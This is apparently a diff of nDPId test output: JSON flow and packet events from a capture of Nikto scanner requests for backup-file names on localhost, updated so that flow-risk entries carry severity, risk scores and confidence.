 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276922,"pkt":"AAAAAAAAAAAAAAAACABFAADFIE9AAEAGG+J\/AAABfwAAAcLMH5CC7hgEsmCzLIAYAED+uQAAAQEICp1m++KdZvviR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276924,"pkt":"AAAAAAAAAAAAAAAACABFAADFRxNAAEAG9R1\/AAABfwAAAcLOH5BdCH9f1fkuqIAYAED+uQAAAQEICp1m++SdZvvjR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276925,"pkt":"AAAAAAAAAAAAAAAACABFAADFQzdAAEAG+Pl\/AAABfwAAAcLQH5BEXHt7s07ta4AYAED+uQAAAQEICp1m++WdZvvlR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276926,"pkt":"AAAAAAAAAAAAAAAACABFAADIWd1AAEAG4lB\/AAABfwAAAcLSH5AL0mGV2bYy0oAYAED+vAAAAQEICp1m++adZvvmR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276928,"pkt":"AAAAAAAAAAAAAAAACABFAADIwcZAAEAGemd\/AAABfwAAAcLUH5BvVfmVJOeoY4AYAED+vAAAAQEICp1m++idZvvoR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420276929,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/L19AAEAGDNh\/AAABfwAAAcLWH5BVghcOcLaACoAYAED+swAAAQEICp1m++mdZvvpR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420276932,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/j\/RAAEAGrEJ\/AAABfwAAAcLYH5CKH7ek\/31EG4AYAED+swAAAQEICp1m++ydZvvsR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276933,"pkt":"AAAAAAAAAAAAAAAACABFAADFT2BAAEAG7NB\/AAABfwAAAcLaH5CU9HcQhzdjIYAYAED+uQAAAQEICp1m++2dZvvtR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
